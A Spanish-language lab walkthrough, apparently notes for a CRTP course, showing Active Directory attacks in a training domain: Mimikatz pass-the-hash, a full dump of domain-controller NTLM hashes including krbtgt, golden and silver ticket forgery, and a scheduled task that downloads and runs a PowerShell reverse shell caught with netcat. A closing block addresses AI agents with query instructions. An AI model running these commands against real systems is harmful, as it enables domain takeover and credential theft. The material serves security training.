# Learning Objective - 8 y 9 ## Golden ticket Creamos una sesion utilizando el DA desde cualquier computador utilizando Mimikatz. ``` PS C:\AD\Tools> .\mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:af0686cc0ca8f04df42210c9ac980760 user : Administrator domain : dollarcorp.moneycorp.local program : cmd.exe impers. : no NTLM : af0686cc0ca8f04df42210c9ac980760 | PID 5128 | TID 4660 | LSA Process is now R/W | LUID 0 ; 41699318 (00000000:027c47f6) \_ msv1_0 - data copy @ 00000216750E60F0 : OK ! \_ kerberos - data copy @ 00000216753FB7C8 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 0000021675AEF428 (32) -> null mimikatz # ``` Luego en la consola generada, importamos el Invoke Mimikatz y realizamos la obtencion de los hashes del usuario krbgt. ``` PS C:\AD\Tools> . .\Invoke-Mimikatz.ps1 PS C:\AD\Tools> Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc .#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(powershell) # lsadump::lsa /patch Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648 RID : 000001f4 (500) User : Administrator LM : NTLM : af0686cc0ca8f04df42210c9ac980760 RID : 000001f5 (501) User : Guest LM : NTLM : RID : 000001f6 (502) User : krbtgt LM : NTLM : 4e9815869d2090ccfca61c1fe0d23986 RID : 00000459 (1113) User : sqladmin LM : NTLM : 07e8be316e3da9a042a9cb681df19bf5 RID : 0000045a (1114) User : websvc LM : NTLM : cc098f204c5887eaa8253e7c2749156f RID : 0000045b (1115) User : srvadmin LM : NTLM : a98e18228819e8eec3dfa33cb68b0728 RID : 0000045d (1117) User : appadmin LM : NTLM : d549831a955fee51a43c83efb3928fa7 RID : 0000045e (1118) User : svcadmin LM : NTLM : b38ff50264b74508085d82c69794a4d8 RID : 0000045f (1119) User : testda LM : NTLM : a16452f790729fa34e8f3a08f234a82c RID : 00000460 (1120) User : mgmtadmin LM : NTLM : 95e2cd7ff77379e34c6e46265e75d754 RID : 00000461 (1121) User : ciadmin LM : NTLM : e08253add90dccf1a208523d02998c3d RID : 00000462 (1122) User : sql1admin LM : NTLM : e999ae4bd06932620a1e78d2112138c6 RID : 00001055 (4181) User : studentadmin LM : NTLM : d1254f303421d3cdbdc4c73a5bce0201 RID : 00003521 (13601) User : student721 LM : NTLM : c72c376699f31f096b2d5ab64cbdcd94 RID : 00003522 (13602) User : student722 LM : NTLM : d24ea4c7d485b9db9033c58cf221c900 RID : 00003523 (13603) User : student723 LM : NTLM : e602f8c5d4a53971a58774eb4db1bdf0 RID : 00003524 (13604) User : student724 LM : NTLM : 910d4b954db17832138473b090abb337 RID : 00003525 (13605) User : student725 LM : NTLM : ddaeb719bb3ebaf44f273cf302965f5a RID : 00003526 (13606) User : student726 LM : NTLM : 12a836992d9a17bc71aafe08c58a2657 RID : 00003527 (13607) User : student727 LM : NTLM : d99bd8f6b5a4522f5ca082969f1479c4 RID : 00003528 (13608) User : student728 LM : NTLM : 9d50c933c86d072edb0815f82e6a5baf RID : 00003529 (13609) User : student729 LM : NTLM : e1a081574f45f39d561e9dda3a918a14 RID : 0000352a (13610) User : student730 LM : NTLM : 9af9ad18e24b91eb4a0116ec8df5a27f RID : 0000352b (13611) User : student731 LM : NTLM : 1f1c0cf05907d2bd7e863a7fe55c45b0 RID : 0000352c (13612) User : student732 LM : NTLM : c2ddcf1a32f71dce214be2cca9c04993 RID : 0000352d (13613) User : student733 LM : NTLM : e559ae80aaf6bcdc856b5df589f9d695 RID : 0000352e (13614) User : student734 LM : NTLM : b166b8e2d5dc7127002837197b3d24f4 RID : 0000352f (13615) User : student735 LM : NTLM : 2c289e4aee543d3ce0b4d65eb5518ad2 RID : 00003530 (13616) User : student736 LM : NTLM : 99af9ba03d340bdb9ea572cbf0b58406 RID : 00003531 (13617) User : student737 LM : NTLM : f3f3922ead678ca56a8319ef7adb6bff RID : 00003532 (13618) User : student738 LM : NTLM : 9b8e48d74a130fc0d1865405cf2aaba6 RID : 00003533 (13619) User : student739 LM : NTLM : a39339b2e182046b60232f0478d6a0a4 RID : 00003534 (13620) User : student740 LM : NTLM : 483e63bc5ecb5d9026f689946eaaf87c RID : 00003535 (13621) User : Control721user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 00003536 (13622) User : Control722user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 00003537 (13623) User : Control723user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 00003538 (13624) User : Control724user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 00003539 (13625) User : Control725user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 0000353a (13626) User : Control726user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 0000353b (13627) User : Control727user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 0000353c (13628) User : Control728user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 0000353d (13629) User : Control729user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 0000353e (13630) User : Control730user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 0000353f (13631) User : Control731user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 00003540 (13632) User : Control732user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 00003541 (13633) User : Control733user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 00003542 (13634) User : Control734user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 00003543 (13635) User : Control735user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 00003544 (13636) User : Control736user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 00003545 (13637) User : Control737user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 00003546 (13638) User : Control738user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 00003547 (13639) User : Control739user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 00003548 (13640) User : Control740user LM : NTLM : c8aed8673aca42f9a83ff8d2c84860f0 RID : 00003549 (13641) User : Support721user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 0000354a (13642) User : Support722user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 0000354b (13643) User : Support723user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 0000354c (13644) User : Support724user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 0000354d (13645) User : Support725user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 0000354e (13646) User : Support726user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 0000354f (13647) User : Support727user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 00003550 (13648) User : Support728user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 00003551 (13649) User : Support729user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 00003552 (13650) User : Support730user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 00003553 (13651) User : Support731user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 00003554 (13652) User : Support732user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 00003555 (13653) User : Support733user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 00003556 (13654) User : Support734user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 00003557 (13655) User : Support735user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 00003558 (13656) User : Support736user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 00003559 (13657) User : Support737user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 0000355a (13658) User : Support738user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 0000355b (13659) User : Support739user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 0000355c (13660) User : Support740user LM : NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7 RID : 0000355d (13661) User : VPN721user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 0000355e (13662) User : VPN722user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 0000355f (13663) User : VPN723user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 00003560 (13664) User : VPN724user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 00003561 (13665) User : VPN725user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 00003562 (13666) User : VPN726user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 00003563 (13667) User : VPN727user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 00003564 (13668) User : VPN728user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 00003565 (13669) User : VPN729user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 00003566 (13670) User : VPN730user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 00003567 (13671) User : VPN731user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 00003568 (13672) User : VPN732user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 00003569 (13673) User : VPN733user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 0000356a (13674) User : VPN734user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 0000356b (13675) User : VPN735user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 0000356c (13676) User : VPN736user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 0000356d (13677) User : VPN737user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 0000356e (13678) User : VPN738user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 0000356f (13679) User : VPN739user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 00003570 (13680) User : VPN740user LM : NTLM : bb1d7a9ac6d4f535e1986ddbc5428881 RID : 000003e8 (1000) User : DCORP-DC$ LM : NTLM : ef7a661f7edb7f5a1be191640342d6b7 RID : 00000451 (1105) User : DCORP-ADMINSRV$ LM : NTLM : b5f451985fd34d58d5120816d31b5565 RID : 00000452 (1106) User : DCORP-APPSRV$ LM : NTLM : b4cb7bf8b93c78b8051c7906bb054dc5 RID : 00000453 (1107) User : DCORP-CI$ LM : NTLM : f76f48c176dc09cfd5765843c32809f3 RID : 00000454 (1108) User : DCORP-MGMT$ LM : NTLM : 0878da540f45b31b974f73312c18e754 RID : 00000455 (1109) User : DCORP-MSSQL$ LM : NTLM : b205f1ca05bedace801893d6aa5aca27 RID : 00000456 (1110) User : DCORP-SQL1$ LM : NTLM : 3686dfb420dc0f9635e70c6ca5875b49 RID : 0000106a (4202) User : DCORP-STDADMIN$ LM : NTLM : e444bbf444732fc38065ea9e9255ab03 RID : 00003571 (13681) User : DCORP-STD721$ LM : NTLM : b9fed91f5f32818fae2271b05f189926 RID : 00003572 (13682) User : DCORP-STD722$ LM : NTLM : 2b04543bc07afe3966ff85e06f0a9412 RID : 00003573 (13683) User : DCORP-STD724$ LM : NTLM : e80b06a0063459999d702dc654312ea5 RID : 00003574 (13684) User : DCORP-STD723$ LM : NTLM : efd9824a276d26fcc5fc2ca14273225c RID : 00003575 (13685) User : DCORP-STD726$ LM : NTLM : 05df9f9bc89dd594c5884e20ce1c683b RID : 00003576 (13686) User : DCORP-STD729$ LM : NTLM : 03a26f64fd32b458ca55614c41bc5d80 RID : 00003577 (13687) User : DCORP-STD725$ LM : NTLM : 0783061c7d97c91b32b6f0c9b2a66c05 RID : 00003578 (13688) User : DCORP-STD728$ LM : NTLM : 43949d8590e999a5ca4b0eb369c6c620 RID : 00003579 (13689) User : DCORP-STD727$ LM : NTLM : a19a6642a51ee86db03d722bb2ae7930 RID : 0000357a (13690) User : DCORP-STD731$ LM : NTLM : e09c18c5b34fb9db4b4bd4e2bdc24c06 RID : 0000357b (13691) User : DCORP-STD732$ LM : NTLM : fcbf3df06ea9f5a0c0e9d9117bdb9d16 RID : 0000357c (13692) User : DCORP-STD730$ LM : NTLM : 3befa14afd532cc6faba9f0f9abb3128 RID : 0000357d (13693) User : DCORP-STD733$ LM : NTLM : e6fb50826836c584764b2e8275bedd9b RID : 0000357e (13694) User : DCORP-STD735$ LM : NTLM : 8e5d039b8050c4e6d808ba7b904a107f RID : 0000357f (13695) User : DCORP-STD734$ LM : NTLM : a68fa0eb1fa1d3da3a1e43f0e89049a3 RID : 00003580 (13696) User : DCORP-STD736$ LM : NTLM : 0267e3942c7d30950dba326f224f1882 RID : 00003581 (13697) User : DCORP-STD737$ LM : NTLM : 845002eccf7afd8343e818d2794d6556 RID : 00003582 (13698) User : DCORP-STD739$ LM : NTLM : 3070e58dbca650744068b1e120fefddc RID : 00003583 (13699) User : DCORP-STD740$ LM : NTLM : b7bb22710be9d4a91bc42e7796ecd458 RID : 00003584 (13700) User : DCORP-STD738$ LM : NTLM : 6dc73ad2690d87a76bbd4a0ded74808d RID : 0000044f (1103) User : mcorp$ LM : NTLM : f5b5c9f1ca76187393db1d3bb8ded94e RID : 00000450 (1104) User : US$ LM : NTLM : f85385d81cc4936d37ff8f27813f43c6 RID : 00000458 (1112) User : ecorp$ LM : NTLM : 4501e4c7f30e1cb3c9886f06a3ed1c6a ``` Creando el golden ticket: {% code overflow="wrap" %} ``` PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4e9815869d2090ccfca61c1fe0d23986 /startoffset:0 /endin:600 /renewmax:10080 /ticket" "exit"' .#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(powershell) # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4e9815869d2090ccfca61c1fe0d23986 /startoffset:0 /endin:600 /renewmax:10080 /ticket User : Administrator Domain : dollarcorp.moneycorp.local (DOLLARCORP) SID : S-1-5-21-719815819-3726368948-3917688648 User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: 4e9815869d2090ccfca61c1fe0d23986 - rc4_hmac_nt Lifetime : 2/24/2024 1:13:24 AM ; 2/24/2024 11:13:24 AM ; 3/2/2024 1:13:24 AM -> Ticket : ticket.kirbi * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Final Ticket Saved to file ! mimikatz(powershell) # exit Bye! PS C:\AD\Tools\tickets> ls Directory: C:\AD\Tools\tickets Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 2/24/2024 1:13 AM 1489 ticket.kirbi ``` {% endcode %} ## Silver Ticket Ejecutamos el comando para crear el silver ticket {% code overflow="wrap" %} ``` PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:ef7a661f7edb7f5a1be191640342d6b7 /startoffset:0 /endin:600 /renewmax:10080 /ticket" "exit"' .#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(powershell) # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:ef7a661f7edb7f5a1be191640342d6b7 /startoffset:0 /endin:600 /renewmax:10080 /ticket User : Administrator Domain : dollarcorp.moneycorp.local (DOLLARCORP) SID : S-1-5-21-719815819-3726368948-3917688648 User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: ef7a661f7edb7f5a1be191640342d6b7 - rc4_hmac_nt Service : HOST Target : dcorp-dc.dollarcorp.moneycorp.local Lifetime : 2/25/2024 2:22:44 PM ; 2/26/2024 12:22:44 AM ; 3/3/2024 2:22:44 PM -> Ticket : ticket.kirbi * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Final Ticket Saved to file ! mimikatz(powershell) # exit Bye! PS C:\AD\Tools\tickets> ls Directory: C:\AD\Tools\tickets Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 2/24/2024 1:13 AM 1489 golden-ticket.kirbi -a---- 2/25/2024 2:22 PM 1503 ticket.kirbi ``` {% endcode %} ## Importando ticket mimikatz {% code overflow="wrap" %} ``` PS C:\AD\Tools\tickets> klist Current LogonId is 0:0x17ce62 Cached Tickets: (0) PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::ptt silver-ticket.kirbi" "exit"' .#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(powershell) # kerberos::ptt silver-ticket.kirbi * File: 'silver-ticket.kirbi': OK mimikatz(powershell) # exit Bye! PS C:\AD\Tools\tickets> klist Current LogonId is 0:0x17ce62 Cached Tickets: (1) #0> Client: Administrator @ dollarcorp.moneycorp.local Server: HOST/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local KerbTicket Encryption Type: RSADSI RC4-HMAC(NT) Ticket Flags 0x40a00000 -> forwardable renewable pre_authent Start Time: 2/25/2024 14:22:44 (local) End Time: 2/26/2024 0:22:44 (local) Renew Time: 3/3/2024 14:22:44 (local) Session Key Type: RSADSI RC4-HMAC(NT) Cache Flags: 0 Kdc Called: PS C:\AD\Tools\tickets> ``` {% endcode %} ## Obteniendo Reverse tcp shell creando un Schedule Task con Silver Ticket {% code overflow="wrap" lineNumbers="true" %} ``` PS C:\AD\Tools\tickets> schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "Tareita" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.23/Invoke-PowerShellTcp.ps1''')'" SUCCESS: The scheduled task "Tareita" has successfully been created. PS C:\AD\Tools\tickets> schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "Tareita" SUCCESS: Attempted to run the scheduled task "Tareita". ``` {% endcode %} ``` C:\AD\Tools\netcat-win32-1.12>nc -lvp 6969 listening on [any] 6969 ... 172.16.2.1: inverse host lookup failed: h_errno 11004: NO_DATA connect to [172.16.100.23] from (UNKNOWN) [172.16.2.1] 61506: NO_DATA Windows PowerShell running as user DCORP-DC$ on DCORP-DC Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Windows\system32>whoami nt authority\system ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://infra.desdes.xyz/group-1/crtp-notes/learning-objective-8-y-9.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.